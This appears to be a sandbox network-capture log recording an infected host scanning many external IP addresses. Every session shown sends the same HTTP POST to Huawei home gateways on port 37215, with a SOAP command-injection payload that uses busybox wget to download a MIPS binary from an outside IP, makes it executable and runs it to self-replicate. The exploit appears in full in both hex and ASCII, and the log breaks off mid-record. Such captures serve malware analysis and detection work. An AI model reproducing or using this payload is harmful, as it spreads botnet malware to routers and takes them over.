                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1158192.168.2.1353038197.214.40.3337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.518843889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1159192.168.2.1344600161.50.124.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.518897057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1160192.168.2.1348434157.63.131.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.518914938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1161192.168.2.1359718157.117.39.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.518939018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1162192.168.2.1341480157.254.114.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.518970966 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1163192.168.2.1349604142.242.25.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.518992901 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1164192.168.2.1358942158.195.4.10237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.519330978 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1165192.168.2.135628641.40.16.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.519335032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1166192.168.2.135397841.35.53.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.519498110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1167192.168.2.1349612157.120.113.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.519642115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 